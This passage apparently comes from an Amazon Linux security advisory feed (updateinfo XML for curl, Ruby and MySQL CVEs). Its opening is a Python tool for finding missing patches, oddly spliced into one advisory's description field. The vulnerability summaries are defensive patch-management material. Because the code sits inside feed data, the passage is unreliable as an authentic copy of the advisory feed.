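    ("libcurl", "x86_64"): ("0", "7.53.1", "16.85.amzn1"),
    ("bash", "x86_64"): ("0", "4.2.46", "34.43.amzn1"),
}

# rpmvercmp splits on anything that is not a digit, a letter or the '~' marker.
_SEG = re.compile(r"[0-9]+|[A-Za-z]+|~")


def rpmvercmp(a, b):
    """Compare two version or release strings the way rpm's rpmvercmp() does.
    Returns -1, 0 or 1. Digit segments compare numerically (leading zeros dropped),
    alpha segments compare as strings, a digit segment beats an alpha segment, and
    '~' sorts before everything including end of string ("1.0~rc1" is older than "1.0")."""
    if a == b:
        return 0
    sa, sb = _SEG.findall(a), _SEG.findall(b)
    for x, y in zip(sa, sb):
        if x == "~" and y == "~":
            continue
        if x == "~":
            return -1
        if y == "~":
            return 1
        if x.isdigit() and y.isdigit():
            x, y = x.lstrip("0"), y.lstrip("0")
            if len(x) != len(y):
                return 1 if len(x) > len(y) else -1
            if x != y:
                return 1 if x > y else -1
        elif x.isdigit():
            return 1
        elif y.isdigit():
            return -1
        elif x != y:
            return 1 if x > y else -1
    if len(sa) == len(sb):
        return 0  # all segments equal; differing separators do not matter
    longer = sa if len(sa) > len(sb) else sb
    if longer[min(len(sa), len(sb))] == "~":
        return -1 if longer is sa else 1  # trailing "~..." makes that side older
    return 1 if longer is sa else -1  # otherwise the side with more segments is newer


def _epoch(e):
    """rpm reports an unset epoch as "(none)"; treat that, None and "" as 0."""
    return 0 if e in (None, "", "(none)") else int(e)


def evrcmp(evr1, evr2):
    """Compare two (epoch, version, release) tuples: epoch first, then version, then release."""
    e1, e2 = _epoch(evr1[0]), _epoch(evr2[0])
    if e1 != e2:
        return 1 if e1 > e2 else -1
    c = rpmvercmp(evr1[1], evr2[1])
    return c if c else rpmvercmp(evr1[2], evr2[2])


def parse_updateinfo(xml_text):
    """Yield one dict per <update>: id, severity, CVE ids and fixed EVR keyed by (name, arch)."""
    root = ET.fromstring(xml_text)
    for upd in root.iter("update"):
        cves = [r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"]
        fixed = {}
        for p in upd.iter("package"):
            fixed[(p.get("name"), p.get("arch"))] = (p.get("epoch", "0"), p.get("version"), p.get("release"))
        yield {"id": upd.findtext("id"), "severity": upd.findtext("severity"), "cves": cves, "fixed": fixed}


def missing_updates(xml_text, installed):
    """Return the advisory/package pairs whose installed EVR is older than the fixed EVR."""
    out = []
    for adv in parse_updateinfo(xml_text):
        for key, fixed in adv["fixed"].items():
            have = installed.get(key)
            if have is not None and evrcmp(have, fixed) == -1:
                out.append({"advisory": adv["id"], "severity": adv["severity"], "cves": adv["cves"],
                            "name": key[0], "arch": key[1], "installed": have, "fixed": fixed})
    return out


if __name__ == "__main__":
    for m in missing_updates(SAMPLE_UPDATEINFO, SAMPLE_INSTALLED):
        print(f"{m['advisory']} ({m['severity']}): {m['name']}.{m['arch']} installed "
              f"{m['installed'][1]}-{m['installed'][2]}, fixed in {m['fixed'][1]}-{m['fixed'][2]}; "
              f"{', '.join(m['cves'])}")
```

On a real host the installed tuples come from `rpm -qa --qf '%{NAME} %{ARCH} %{EPOCH} %{VERSION} %{RELEASE}\n'` (rpm prints "(none)" for an unset epoch, which evrcmp treats as 0), and `yum updateinfo list cves` gives the same answer from the advisory feed directly; the reimplementation is useful where the feed must be checked off-box, for example against a package inventory exported from an image.
]]>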
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14618" title="" id="CVE-2018-14618" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.53.1" release="16.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-16.85.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="16.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-16.85.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.53.1" release="16.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-16.85.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="16.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-16.85.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="16.85.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-16.85.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="16.85.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-16.85.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="16.85.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-16.85.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="16.85.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-16.85.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1113</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1113: important priority package update for ruby23 ruby24</title><issued date="2018-12-06 00:31:00" /><updated date="2018-12-14 19:27:00" /><severity>important</severity><description>Package updates are 
available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16396:
An issue was discovered in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. It does not taint strings that result from unpacking tainted strings with some formats.
1643089:
CVE-2018-16396 ruby: Tainted flags are not propagated in Array#pack and String#unpack with some directives
CVE-2018-16395:
An issue was discovered in the OpenSSL library in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. When two OpenSSL::X509::Name objects are compared using ==, depending on the ordering, non-equal objects may return true. When the first argument is one character longer than the second, or the second argument contains a character that is one less than a character in the same position of the first argument, the result of == will be true. This could be leveraged to create an illegitimate certificate that may be accepted as legitimate and then used in signing or encryption operations.
1643086:
CVE-2018-16395 ruby: OpenSSL::X509::Name equality check does not work correctly
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16395" title="" id="CVE-2018-16395" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16396" title="" id="CVE-2018-16396" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby23-doc" version="2.3.8" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-doc-2.3.8-1.20.amzn1.noarch.rpm</filename></package><package name="rubygem23-did_you_mean" version="1.0.0" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-did_you_mean-1.0.0-1.20.amzn1.noarch.rpm</filename></package><package name="ruby23-devel" version="2.3.8" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-devel-2.3.8-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby23-libs" version="2.3.8" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-libs-2.3.8-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-io-console-0.4.5-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygems23" version="2.5.2.3" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-2.5.2.3-1.20.amzn1.noarch.rpm</filename></package><package name="ruby23-irb" version="2.3.8" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-irb-2.3.8-1.20.amzn1.noarch.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-psych-2.1.0.1-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" 
release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-json-1.8.3.1-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.8" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-debuginfo-2.3.8-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby23" version="2.3.8" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-2.3.8-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygems23-devel" version="2.5.2.3" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-devel-2.5.2.3-1.20.amzn1.noarch.rpm</filename></package><package name="ruby23-devel" version="2.3.8" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-devel-2.3.8-1.20.amzn1.i686.rpm</filename></package><package name="ruby23-libs" version="2.3.8" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-libs-2.3.8-1.20.amzn1.i686.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-io-console-0.4.5-1.20.amzn1.i686.rpm</filename></package><package name="ruby23" version="2.3.8" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-2.3.8-1.20.amzn1.i686.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-json-1.8.3.1-1.20.amzn1.i686.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-psych-2.1.0.1-1.20.amzn1.i686.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.20.amzn1.i686.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.8" release="1.20.amzn1" epoch="0" 
arch="i686"><filename>Packages/ruby23-debuginfo-2.3.8-1.20.amzn1.i686.rpm</filename></package><package name="rubygems24-devel" version="2.6.14.3" release="1.30.7.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.3-1.30.7.amzn1.noarch.rpm</filename></package><package name="ruby24-libs" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.5-1.30.7.amzn1.x86_64.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.7.amzn1.x86_64.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.5-1.30.7.amzn1.x86_64.rpm</filename></package><package name="ruby24-devel" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.5-1.30.7.amzn1.x86_64.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="1.30.7.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-1.30.7.amzn1.noarch.rpm</filename></package><package name="rubygems24" version="2.6.14.3" release="1.30.7.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.3-1.30.7.amzn1.noarch.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-1.30.7.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-1.30.7.amzn1.x86_64.rpm</filename></package><package name="ruby24-irb" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.5-1.30.7.amzn1.noarch.rpm</filename></package><package name="ruby24-doc" version="2.4.5" release="1.30.7.amzn1" epoch="0" 
arch="noarch"><filename>Packages/ruby24-doc-2.4.5-1.30.7.amzn1.noarch.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-1.30.7.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-1.30.7.amzn1.x86_64.rpm</filename></package><package name="ruby24" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.5-1.30.7.amzn1.x86_64.rpm</filename></package><package name="ruby24-libs" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.5-1.30.7.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-1.30.7.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.5-1.30.7.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.5-1.30.7.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.7.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-1.30.7.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.5-1.30.7.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.7.amzn1" epoch="0" 
arch="i686"><filename>Packages/rubygem24-psych-2.2.2-1.30.7.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-1.30.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1114</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1114: medium priority package update for mysql57</title><issued date="2018-12-06 00:36:00" /><updated date="2018-12-07 01:08:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3284:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640310:
CVE-2018-3284 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3283:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Logging). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640333:
CVE-2018-3283 mysql: Server: Logging unspecified vulnerability (CPU Oct 2018)
CVE-2018-3282:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Storage Engines). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640322:
CVE-2018-3282 mysql: Server: Storage Engines unspecified vulnerability (CPU Oct 2018)
CVE-2018-3278:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: RBR). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640320:
CVE-2018-3278 mysql: Server: RBR unspecified vulnerability (CPU Oct 2018)
CVE-2018-3277:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640325:
CVE-2018-3277 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3276:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640307:
CVE-2018-3276 mysql: Server: Memcached unspecified vulnerability (CPU Oct 2018)
CVE-2018-3251:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640335:
CVE-2018-3251 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3247:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Merge). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1640317:
CVE-2018-3247 mysql: Server: Merge unspecified vulnerability (CPU Oct 2018)
CVE-2018-3200:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640308:
CVE-2018-3200 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3187:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1640324:
CVE-2018-3187 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2018)
CVE-2018-3185:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1640337:
CVE-2018-3185 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3174:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H).
1640321:
CVE-2018-3174 mysql: Init script calling kill with root privileges using pid from pidfile owned by mysql user (CPU Oct 2018)
CVE-2018-3173:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640312:
CVE-2018-3173 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3171:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Partition). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.0 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H).
1640334:
CVE-2018-3171 mysql: Server: Partition unspecified vulnerability (CPU Oct 2018)
CVE-2018-3162:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640316:
CVE-2018-3162 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3161:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Partition). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640319:
CVE-2018-3161 mysql: Server: Partition unspecified vulnerability (CPU Oct 2018)
CVE-2018-3156:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640318:
CVE-2018-3156 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3155:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H).
1640340:
CVE-2018-3155 mysql: Server: Parser unspecified vulnerability (CPU Oct 2018)
CVE-2018-3144:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Audit). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
1640326:
CVE-2018-3144 mysql: Server: Security: Audit unspecified vulnerability (CPU Oct 2018)
CVE-2018-3143:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640332:
CVE-2018-3143 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3133:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640331:
CVE-2018-3133 mysql: Server: Parser unspecified vulnerability (CPU Oct 2018)
CVE-2016-9843:
The crc32_big function in crc32.c in zlib 1.2.8 might allow context-dependent attackers to have unspecified impact via vectors involving big-endian CRC calculation.
1402351:
CVE-2016-9843 zlib: Big-endian out-of-bounds pointer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9843" title="" id="CVE-2016-9843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3133" title="" id="CVE-2018-3133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3143" title="" id="CVE-2018-3143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3144" title="" id="CVE-2018-3144" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3155" title="" id="CVE-2018-3155" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3156" title="" id="CVE-2018-3156" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3161" title="" id="CVE-2018-3161" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3162" title="" id="CVE-2018-3162" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3171" title="" id="CVE-2018-3171" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3173" title="" id="CVE-2018-3173" type="cve" /><reference 